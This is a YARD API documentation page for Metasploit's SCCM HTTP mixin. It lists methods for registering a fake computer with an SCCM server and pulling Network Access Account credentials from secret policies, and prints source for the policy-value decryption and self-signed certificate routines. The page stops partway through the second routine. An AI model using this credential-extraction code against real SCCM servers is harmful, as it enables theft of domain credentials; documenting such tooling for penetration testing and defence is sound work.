adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
c3f5bd3de2d1affa01e2f6c2066c6bb0fc6413bc
metasploit-gs/api/Msf/Exploit/Remote/HTTP/SCCM.html
T

1515 lines
155 KiB
HTML
Raw Normal View History

Reboot gh-pages
2026-05-08 17:08:43 +00:00
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>
Module: Msf::Exploit::Remote::HTTP::SCCM
&mdash; Documentation by YARD 0.9.37
</title>
<link rel="stylesheet" href="../../../../css/style.css" type="text/css" />
<link rel="stylesheet" href="../../../../css/common.css" type="text/css" />
<script type="text/javascript">
pathId = "Msf::Exploit::Remote::HTTP::SCCM";
relpath = '../../../../';
</script>
<script type="text/javascript" charset="utf-8" src="../../../../js/jquery.js"></script>
<script type="text/javascript" charset="utf-8" src="../../../../js/app.js"></script>
</head>
<body>
<div class="nav_wrap">
<iframe id="nav" src="../../../../class_list.html?1"></iframe>
<div id="resizer"></div>
</div>
<div id="main" tabindex="-1">
<div id="header">
<div id="menu">
<a href="../../../../_index.html">Index (S)</a> &raquo;
<span class='title'><span class='object_link'><a href="../../../../Msf.html" title="Msf (module)">Msf</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../../../Exploit.html" title="Msf::Exploit (class)">Exploit</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../../Remote.html" title="Msf::Exploit::Remote (class)">Remote</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../HTTP.html" title="Msf::Exploit::Remote::HTTP (module)">HTTP</a></span></span>
&raquo;
<span class="title">SCCM</span>
</div>
<div id="search">
<a class="full_list_link" id="class_list_link"
href="../../../../class_list.html">
<svg width="24" height="24">
<rect x="0" y="4" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="12" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="20" width="24" height="4" rx="1" ry="1"></rect>
</svg>
</a>
</div>
<div class="clear"></div>
</div>
<div id="content"><h1>Module: Msf::Exploit::Remote::HTTP::SCCM
</h1>
<div class="box_info">
<dl>
<dt>Includes:</dt>
<dd><span class='object_link'><a href="../../../Auxiliary/Report.html" title="Msf::Auxiliary::Report (module)">Auxiliary::Report</a></span>, <span class='object_link'><a href="../HttpClient.html" title="Msf::Exploit::Remote::HttpClient (module)">Msf::Exploit::Remote::HttpClient</a></span>, <span class='object_link'><a href="../../Retry.html" title="Msf::Exploit::Retry (module)">Msf::Exploit::Retry</a></span></dd>
</dl>
<dl>
<dt>Defined in:</dt>
<dd>lib/msf/core/exploit/remote/http/sccm.rb</dd>
</dl>
</div>
<h2>Overview</h2><div class="docstring">
<div class="discussion">
<p>This module provides a way of interacting with SCCM servers</p>
</div>
</div>
<div class="tags">
</div>
<h2>
Constant Summary
<small><a href="#" class="constants_summary_toggle">collapse</a></small>
</h2>
<dl class="constants">
<dt id="KEY_SIZE-constant" class="">KEY_SIZE =
</dt>
<dd><pre class="code"><span class='int'>2048</span></pre></dd>
<dt id="SECRET_POLICY_FLAG-constant" class="">SECRET_POLICY_FLAG =
</dt>
<dd><pre class="code"><span class='int'>4</span></pre></dd>
</dl>
<h2>Instance Attribute Summary</h2>
<h3 class="inherited">Attributes included from <span class='object_link'><a href="../HttpClient.html" title="Msf::Exploit::Remote::HttpClient (module)">Msf::Exploit::Remote::HttpClient</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../HttpClient.html#client-instance_method" title="Msf::Exploit::Remote::HttpClient#client (method)">#client</a></span>, <span class='object_link'><a href="../HttpClient.html#cookie_jar-instance_method" title="Msf::Exploit::Remote::HttpClient#cookie_jar (method)">#cookie_jar</a></span></p>
<h2>
Instance Method Summary
<small><a href="#" class="summary_toggle">collapse</a></small>
</h2>
<ul class="summary">
<li class="public ">
<span class="summary_signature">
<a href="#deobfuscate_policy_value-instance_method" title="#deobfuscate_policy_value (instance method)">#<strong>deobfuscate_policy_value</strong>(value) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#generate_key_and_cert-instance_method" title="#generate_key_and_cert (instance method)">#<strong>generate_key_and_cert</strong>(subject) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Create a self-signed private key and certificate for our computer registration.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#get_creds_from_policy_doc-instance_method" title="#get_creds_from_policy_doc (instance method)">#<strong>get_creds_from_policy_doc</strong>(policy) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Extract obfuscated credentials from the resulting policy XML document.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#get_naa_credentials-instance_method" title="#get_naa_credentials (instance method)">#<strong>get_naa_credentials</strong>(opts, management_point, site_code, computer_user) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#get_secret_policies-instance_method" title="#get_secret_policies (instance method)">#<strong>get_secret_policies</strong>(http_opts, management_point, site_code, key, cert, sms_id, computer_user) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#make_ms_pubkey-instance_method" title="#make_ms_pubkey (instance method)">#<strong>make_ms_pubkey</strong>(pub_key) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Make a pubkey structure (<a href="https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-mqqb/ade9efde-3ec8-4e47-9ae9-34b64d8081bb">learn.microsoft.com/en-us/openspecs/windows_protocols/ms-mqqb/ade9efde-3ec8-4e47-9ae9-34b64d8081bb</a>).</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#mscrypt_derive_key_sha1-instance_method" title="#mscrypt_derive_key_sha1 (instance method)">#<strong>mscrypt_derive_key_sha1</strong>(secret) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#register_request-instance_method" title="#register_request (instance method)">#<strong>register_request</strong>(http_opts, management_point, key, cert, computer_user) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Make a request to the SCCM server to register our computer.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#report_creds-instance_method" title="#report_creds (instance method)">#<strong>report_creds</strong>(ip_address, user, password) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#request_policy-instance_method" title="#request_policy (instance method)">#<strong>request_policy</strong>(http_opts, policy_url, sms_id, key) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Request the policy from the policy_url.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#rsa_sign-instance_method" title="#rsa_sign (instance method)">#<strong>rsa_sign</strong>(key, data) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Sign the data using the RSA key, and reverse it (strange, but its whats required).</p>
</div></span>
</li>
</ul>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../HttpClient.html" title="Msf::Exploit::Remote::HttpClient (module)">Msf::Exploit::Remote::HttpClient</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../HttpClient.html#basic_auth-instance_method" title="Msf::Exploit::Remote::HttpClient#basic_auth (method)">#basic_auth</a></span>, <span class='object_link'><a href="../HttpClient.html#cleanup-instance_method" title="Msf::Exploit::Remote::HttpClient#cleanup (method)">#cleanup</a></span>, <span class='object_link'><a href="../HttpClient.html#configure_http_login_scanner-instance_method" title="Msf::Exploit::Remote::HttpClient#configure_http_login_scanner (method)">#configure_http_login_scanner</a></span>, <span class='object_link'><a href="../HttpClient.html#connect-instance_method" title="Msf::Exploit::Remote::HttpClient#connect (method)">#connect</a></span>, <span class='object_link'><a href="../HttpClient.html#connect_ws-instance_method" title="Msf::Exploit::Remote::HttpClient#connect_ws (method)">#connect_ws</a></span>, <span class='object_link'><a href="../HttpClient.html#deregister_http_client_options-instance_method" title="Msf::Exploit::Remote::HttpClient#deregister_http_client_options (method)">#deregister_http_client_options</a></span>, <span class='object_link'><a href="../HttpClient.html#disconnect-instance_method" title="Msf::Exploit::Remote::HttpClient#disconnect (method)">#disconnect</a></span>, <span class='object_link'><a href="../HttpClient.html#download-instance_method" title="Msf::Exploit::Remote::HttpClient#download (method)">#download</a></span>, <span class='object_link'><a href="../HttpClient.html#full_uri-instance_method" title="Msf::Exploit::Remote::HttpClient#full_uri (method)">#full_uri</a></span>, <span class='object_link'><a href="../HttpClient.html#handler-instance_method" title="Msf::Exploit::Remote::HttpClient#handler (method)">#handler</a></span>, <span class='object_link'><a href="../HttpClient.html#http_fingerprint-instance_method" title="Msf::Exploit::Remote::HttpClient#http_fingerprint (method)">#http_fingerprint</a></span>, <span class='object_link'><a href="../HttpClient.html#initialize-instance_method" title="Msf::Exploit::Remote::HttpClient#initialize (method)">#initialize</a></span>, <span class='object_link'><a href="../HttpClient.html#lookup_http_fingerprints-instance_method" title="Msf::Exploit::Remote::HttpClient#lookup_http_fingerprints (method)">#lookup_http_fingerprints</a></span>, <span class='object_link'><a href="../HttpClient.html#normalize_uri-instance_method" title="Msf::Exploit::Remote::HttpClient#normalize_uri (method)">#normalize_uri</a></span>, <span class='object_link'><a href="../HttpClient.html#path_from_uri-instance_method" title="Msf::Exploit::Remote::HttpClient#path_from_uri (method)">#path_from_uri</a></span>, <span class='object_link'><a href="../HttpClient.html#peer-instance_method" title="Msf::Exploit::Remote::HttpClient#peer (method)">#peer</a></span>, <span class='object_link'><a href="../HttpClient.html#proxies-instance_method" title="Msf::Exploit::Remote::HttpClient#proxies (method)">#proxies</a></span>, <span class='object_link'><a href="../HttpClient.html#reconfig_redirect_opts!-instance_method" title="Msf::Exploit::Remote::HttpClient#reconfig_redirect_opts! (method)">#reconfig_redirect_opts!</a></span>, <span class='object_link'><a href="../HttpClient.html#request_opts_from_url-instance_method" title="Msf::Exploit::Remote::HttpClient#request_opts_from_url (method)">#request_opts_from_url</a></span>, <span class='object_link'><a href="../HttpClient.html#request_url-instance_method" title="Msf::Exploit::Remote::HttpClient#request_url (method)">#request_url</a></span>, <span class='object_link'><a href="../HttpClient.html#rhost-instance_method" title="Msf::Exploit::Remote::HttpClient#rhost (method)">#rhost</a></span>, <span class='object_link'><a href="../HttpClient.html#rport-instance_method" title="Msf::Exploit::Remote::HttpClient#rport (method)">#rport</a></span>, <span class='object_link'><a href="../HttpClient.html#send_request_cgi-instance_method" title="Msf::Exploit::Remote::HttpClient#send_request_cgi (method)">#send_request_cgi</a></span>, <span class='object_link'><a href="../Http
<h3 class="inherited">Methods included from <span class='object_link'><a href="../Kerberos/ServiceAuthenticator/Options.html" title="Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Options (module)">Kerberos::ServiceAuthenticator::Options</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../Kerberos/ServiceAuthenticator/Options.html#kerberos_auth_options-instance_method" title="Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Options#kerberos_auth_options (method)">#kerberos_auth_options</a></span>, <span class='object_link'><a href="../Kerberos/ServiceAuthenticator/Options.html#kerberos_clock_skew_seconds-instance_method" title="Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Options#kerberos_clock_skew_seconds (method)">#kerberos_clock_skew_seconds</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../Kerberos/Ticket/Storage.html" title="Msf::Exploit::Remote::Kerberos::Ticket::Storage (module)">Kerberos::Ticket::Storage</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../Kerberos/Ticket/Storage.html#initialize-instance_method" title="Msf::Exploit::Remote::Kerberos::Ticket::Storage#initialize (method)">#initialize</a></span>, <span class='object_link'><a href="../Kerberos/Ticket/Storage.html#kerberos_storage_options-instance_method" title="Msf::Exploit::Remote::Kerberos::Ticket::Storage#kerberos_storage_options (method)">#kerberos_storage_options</a></span>, <span class='object_link'><a href="../Kerberos/Ticket/Storage.html#kerberos_ticket_storage-instance_method" title="Msf::Exploit::Remote::Kerberos::Ticket::Storage#kerberos_ticket_storage (method)">#kerberos_ticket_storage</a></span>, <span class='object_link'><a href="../Kerberos/Ticket/Storage.html#store_ccache-class_method" title="Msf::Exploit::Remote::Kerberos::Ticket::Storage.store_ccache (method)">store_ccache</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../../Auxiliary/LoginScanner.html" title="Msf::Auxiliary::LoginScanner (module)">Auxiliary::LoginScanner</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../../Auxiliary/LoginScanner.html#configure_login_scanner-instance_method" title="Msf::Auxiliary::LoginScanner#configure_login_scanner (method)">#configure_login_scanner</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../../Auxiliary/Report.html" title="Msf::Auxiliary::Report (module)">Auxiliary::Report</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../../Auxiliary/Report.html#active_db%3F-instance_method" title="Msf::Auxiliary::Report#active_db? (method)">#active_db?</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#create_cracked_credential-instance_method" title="Msf::Auxiliary::Report#create_cracked_credential (method)">#create_cracked_credential</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#create_credential-instance_method" title="Msf::Auxiliary::Report#create_credential (method)">#create_credential</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#create_credential_and_login-instance_method" title="Msf::Auxiliary::Report#create_credential_and_login (method)">#create_credential_and_login</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#create_credential_login-instance_method" title="Msf::Auxiliary::Report#create_credential_login (method)">#create_credential_login</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#db-instance_method" title="Msf::Auxiliary::Report#db (method)">#db</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#db_warning_given%3F-instance_method" title="Msf::Auxiliary::Report#db_warning_given? (method)">#db_warning_given?</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#get_client-instance_method" title="Msf::Auxiliary::Report#get_client (method)">#get_client</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#get_host-instance_method" title="Msf::Auxiliary::Report#get_host (method)">#get_host</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#inside_workspace_boundary%3F-instance_method" title="Msf::Auxiliary::Report#inside_workspace_boundary? (method)">#inside_workspace_boundary?</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#invalidate_login-instance_method" title="Msf::Auxiliary::Report#invalidate_login (method)">#invalidate_login</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#mytask-instance_method" title="Msf::Auxiliary::Report#mytask (method)">#mytask</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#myworkspace-instance_method" title="Msf::Auxiliary::Report#myworkspace (method)">#myworkspace</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#myworkspace_id-instance_method" title="Msf::Auxiliary::Report#myworkspace_id (method)">#myworkspace_id</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#report_auth_info-instance_method" title="Msf::Auxiliary::Report#report_auth_info (method)">#report_auth_info</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#report_client-instance_method" title="Msf::Auxiliary::Report#report_client (method)">#report_client</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#report_exploit-instance_method" title="Msf::Auxiliary::Report#report_exploit (method)">#report_exploit</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#report_host-instance_method" title="Msf::Auxiliary::Report#report_host (method)">#report_host</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#report_loot-instance_method" title="Msf::Auxiliary::Report#report_loot (method)">#report_loot</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#report_note-instance_method" title="Msf::Auxiliary::Report#report_note (method)">#report_note</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#report_service-instance_method" title="Msf::Auxiliary::Report#report_service (method)">#report_service</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#report_vuln-instance_method" title="Msf::Auxiliary::Report#report_vuln (method)">#report_vuln</a></span>, <span class='object_link'><a href="../../../Auxiliary/Report.html#rep
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../../../Metasploit/Framework/Require.html" title="Metasploit::Framework::Require (module)">Metasploit::Framework::Require</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../../../Metasploit/Framework/Require.html#optionally-class_method" title="Metasploit::Framework::Require.optionally (method)">optionally</a></span>, <span class='object_link'><a href="../../../../Metasploit/Framework/Require.html#optionally_active_record_railtie-class_method" title="Metasploit::Framework::Require.optionally_active_record_railtie (method)">optionally_active_record_railtie</a></span>, <span class='object_link'><a href="../../../../Metasploit/Framework/Require.html#optionally_include_metasploit_credential_creation-class_method" title="Metasploit::Framework::Require.optionally_include_metasploit_credential_creation (method)">optionally_include_metasploit_credential_creation</a></span>, <span class='object_link'><a href="../../../../Metasploit/Framework/Require.html#optionally_include_metasploit_credential_creation-instance_method" title="Metasploit::Framework::Require#optionally_include_metasploit_credential_creation (method)">#optionally_include_metasploit_credential_creation</a></span>, <span class='object_link'><a href="../../../../Metasploit/Framework/Require.html#optionally_require_metasploit_db_gem_engines-class_method" title="Metasploit::Framework::Require.optionally_require_metasploit_db_gem_engines (method)">optionally_require_metasploit_db_gem_engines</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../Retry.html" title="Msf::Exploit::Retry (module)">Msf::Exploit::Retry</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../Retry.html#retry_until_truthy-instance_method" title="Msf::Exploit::Retry#retry_until_truthy (method)">#retry_until_truthy</a></span></p>
<div id="instance_method_details" class="method_details_list">
<h2>Instance Method Details</h2>
<div class="method_details first">
<h3 class="signature first" id="deobfuscate_policy_value-instance_method">
#<strong>deobfuscate_policy_value</strong>(value) &#x21d2; <tt>Object</tt>
</h3><table class="source_code">
<tr>
<td>
<pre class="lines">
290
291
292
293
294
295
296
297
298
299
300
301
302
303</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http/sccm.rb', line 290</span>
<span class='kw'>def</span> <span class='id identifier rubyid_deobfuscate_policy_value'>deobfuscate_policy_value</span><span class='lparen'>(</span><span class='id identifier rubyid_value'>value</span><span class='rparen'>)</span>
<span class='id identifier rubyid_value'>value</span> <span class='op'>=</span> <span class='lbracket'>[</span><span class='id identifier rubyid_value'>value</span><span class='period'>.</span><span class='id identifier rubyid_gsub'>gsub</span><span class='lparen'>(</span><span class='tstring'><span class='regexp_beg'>/</span><span class='tstring_content'>[^0-9A-Fa-f]</span><span class='regexp_end'>/</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_pack'>pack</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>H*</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_data_length'>data_length</span> <span class='op'>=</span> <span class='id identifier rubyid_value'>value</span><span class='lbracket'>[</span><span class='int'>52</span><span class='op'>..</span><span class='int'>55</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_unpack'>unpack</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>I</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='lbracket'>[</span><span class='int'>0</span><span class='rbracket'>]</span>
<span class='id identifier rubyid_buffer'>buffer</span> <span class='op'>=</span> <span class='id identifier rubyid_value'>value</span><span class='lbracket'>[</span><span class='int'>64</span><span class='op'>..</span><span class='int'>64</span> <span class='op'>+</span> <span class='id identifier rubyid_data_length'>data_length</span> <span class='op'>-</span> <span class='int'>1</span><span class='rbracket'>]</span>
<span class='id identifier rubyid_key'>key</span> <span class='op'>=</span> <span class='id identifier rubyid_mscrypt_derive_key_sha1'>mscrypt_derive_key_sha1</span><span class='lparen'>(</span><span class='id identifier rubyid_value'>value</span><span class='lbracket'>[</span><span class='int'>4</span><span class='op'>..</span><span class='int'>43</span><span class='rbracket'>]</span><span class='rparen'>)</span>
<span class='id identifier rubyid_iv'>iv</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\x00</span><span class='tstring_end'>&quot;</span></span> <span class='op'>*</span> <span class='int'>8</span>
<span class='id identifier rubyid_cipher'>cipher</span> <span class='op'>=</span> <span class='const'>OpenSSL</span><span class='op'>::</span><span class='const'>Cipher</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>des-ede3-cbc</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_cipher'>cipher</span><span class='period'>.</span><span class='id identifier rubyid_decrypt'>decrypt</span>
<span class='id identifier rubyid_cipher'>cipher</span><span class='period'>.</span><span class='id identifier rubyid_iv'>iv</span> <span class='op'>=</span> <span class='id identifier rubyid_iv'>iv</span>
<span class='id identifier rubyid_cipher'>cipher</span><span class='period'>.</span><span class='id identifier rubyid_key'>key</span> <span class='op'>=</span> <span class='id identifier rubyid_key'>key</span>
<span class='id identifier rubyid_result'>result</span> <span class='op'>=</span> <span class='id identifier rubyid_cipher'>cipher</span><span class='period'>.</span><span class='id identifier rubyid_update'>update</span><span class='lparen'>(</span><span class='id identifier rubyid_buffer'>buffer</span><span class='rparen'>)</span> <span class='op'>+</span> <span class='id identifier rubyid_cipher'>cipher</span><span class='period'>.</span><span class='id identifier rubyid_final'>final</span>
<span class='id identifier rubyid_result'>result</span><span class='period'>.</span><span class='id identifier rubyid_force_encoding'>force_encoding</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>utf-16le</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_encode'>encode</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>utf-8</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="generate_key_and_cert-instance_method">
#<strong>generate_key_and_cert</strong>(subject) &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Create a self-signed private key and certificate for our computer registration</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http/sccm.rb', line 330</span>
<span class='kw'>def</span> <span class='id identifier rubyid_generate_key_and_cert'>generate_key_and_cert</span><span class='lparen'>(</span><span class='id identifier rubyid_subject'>subject</span><span class='rparen'>)</span>
<span class='id identifier rubyid_key'>key</span> <span class='op'>=</span> <span class='const'>OpenSSL</span><span class='op'>::</span><span class='const'>PKey</span><span class='op'>::</span><span class='const'>RSA</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span><span class='lparen'>(</span><span class='const'><span class='object_link'><a href="#KEY_SIZE-constant" title="Msf::Exploit::Remote::HTTP::SCCM::KEY_SIZE (constant)">KEY_SIZE</a></span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_cert'>cert</span> <span class='op'>=</span> <span class='const'>OpenSSL</span><span class='op'>::</span><span class='const'>X509</span><span class='op'>::</span><span class='const'>Certificate</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span>
<span class='id identifier rubyid_cert'>cert</span><span class='period'>.</span><span class='id identifier rubyid_version'>version</span> <span class='op'>=</span> <span class='int'>2</span>
<span class='id identifier rubyid_cert'>cert</span><span class='period'>.</span><span class='id identifier rubyid_serial'>serial</span> <span class='op'>=</span> <span class='lparen'>(</span><span class='id identifier rubyid_rand'>rand</span><span class='lparen'>(</span><span class='int'>0xFFFFFFFF</span><span class='rparen'>)</span> <span class='op'>&lt;&lt;</span> <span class='int'>32</span><span class='rparen'>)</span> <span class='op'>+</span> <span class='id identifier rubyid_rand'>rand</span><span class='lparen'>(</span><span class='int'>0xFFFFFFFF</span><span class='rparen'>)</span>
<span class='id identifier rubyid_cert'>cert</span><span class='period'>.</span><span class='id identifier rubyid_public_key'>public_key</span> <span class='op'>=</span> <span class='id identifier rubyid_key'>key</span><span class='period'>.</span><span class='id identifier rubyid_public_key'>public_key</span>
<span class='id identifier rubyid_cert'>cert</span><span class='period'>.</span><span class='id identifier rubyid_issuer'>issuer</span> <span class='op'>=</span> <span class='const'>OpenSSL</span><span class='op'>::</span><span class='const'>X509</span><span class='op'>::</span><span class='const'>Name</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span><span class='lparen'>(</span><span class='lbracket'>[</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>CN</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='id identifier rubyid_subject'>subject</span><span class='rbracket'>]</span><span class='rbracket'>]</span><span class='rparen'>)</span>
<span class='id identifier rubyid_cert'>cert</span><span class='period'>.</span><span class='id identifier rubyid_subject'>subject</span> <span class='op'>=</span> <span class='const'>OpenSSL</span><span class='op'>::</span><span class='const'>X509</span><span class='op'>::</span><span class='const'>Name</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span><span class='lparen'>(</span><span class='lbracket'>[</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>CN</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='id identifier rubyid_subject'>subject</span><span class='rbracket'>]</span><span class='rbracket'>]</span><span class='rparen'>)</span>
<span class='id identifier rubyid_yr'>yr</span> <span class='op'>=</span> <span class='int'>24</span> <span class='op'>*</span> <span class='int'>3600</span> <span class='op'>*</span> <span class='int'>365</span>
<span class='id identifier rubyid_cert'>cert</span><span class='period'>.</span><span class='id identifier rubyid_not_before'>not_before</span> <span class='op'>=</span> <span class='const'>Time</span><span class='period'>.</span><span class='id identifier rubyid_at'>at</span><span class='lparen'>(</span><span class='const'>Time</span><span class='period'>.</span><span class='id identifier rubyid_now'>now</span><span class='period'>.</span><span class='id identifier rubyid_to_i'>to_i</span> <span class='op'>-</span> <span class='id identifier rubyid_rand'>rand</span><span class='lparen'>(</span><span class='id identifier rubyid_yr'>yr</span> <span class='op'>*</span> <span class='int'>3</span><span class='rparen'>)</span> <span class='op'>-</span> <span class='id identifier rubyid_yr'>yr</span><span class='rparen'>)</span>
<span class='id identifier rubyid_cert'>cert</span><span class='period'>.</span><span class='id identifier rubyid_not_after'>not_after</span> <span class='op'>=</span> <span class='const'>Time</span><span class='period'>.</span><span class='id identifier rubyid_at'>at</span><span class='lparen'>(</span><span class='id identifier rubyid_cert'>cert</span><span class='period'>.</span><span class='id identifier rubyid_not_before'>not_before</span><span class='period'>.</span><span class='id identifier rubyid_to_i'>to_i</span> <span class='op'>+</span> <span class='lparen'>(</span><span class='id identifier rubyid_rand'>rand</span><span class='lparen'>(</span><span class='int'>4</span><span class='op'>..</span><span class='int'>9</span><span class='rparen'>)</span> <span class='op'>*</span> <span class='id identifier rubyid_yr'>yr</span><span class='rparen'>)</span><span class='rparen'>)</span>
<span class='id identifier rubyid_ef'>ef</span> <span class='op'>=</span> <span class='const'>OpenSSL</span><span class='op'>::</span><span class='const'>X509</span><span class='op'>::</span><span class='const'>ExtensionFactory</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span>
<span class='id identifier rubyid_ef'>ef</span><span class='period'>.</span><span class='id identifier rubyid_subject_certificate'>subject_certificate</span> <span class='op'>=</span> <span class='id identifier rubyid_cert'>cert</span>
<span class='id identifier rubyid_ef'>ef</span><span class='period'>.</span><span class='id identifier rubyid_issuer_certificate'>issuer_certificate</span> <span class='op'>=</span> <span class='id identifier rubyid_cert'>cert</span>
<span class='id identifier rubyid_cert'>cert</span><span class='period'>.</span><span class='id identifier rubyid_extensions'>extensions</span> <span class='op'>=</span> <span class='lbracket'>[</span>
<span class='id identifier rubyid_ef'>ef</span><span class='period'>.</span><span class='id identifier rubyid_create_extension'>create_extension</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>keyUsage</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>digitalSignature,dataEncipherment</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='comma'>,</span>
<span class='id identifier rubyid_ef'>ef</span><span class='period'>.</span><span class='id identifier rubyid_create_extension'>create_extension</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>extendedKeyUsage</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>1.3.6.1.4.1.311.101.2, 1.3.6.1.4.1.311.101</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='comma'>,</span>
<span class='rbracket'>]</span>
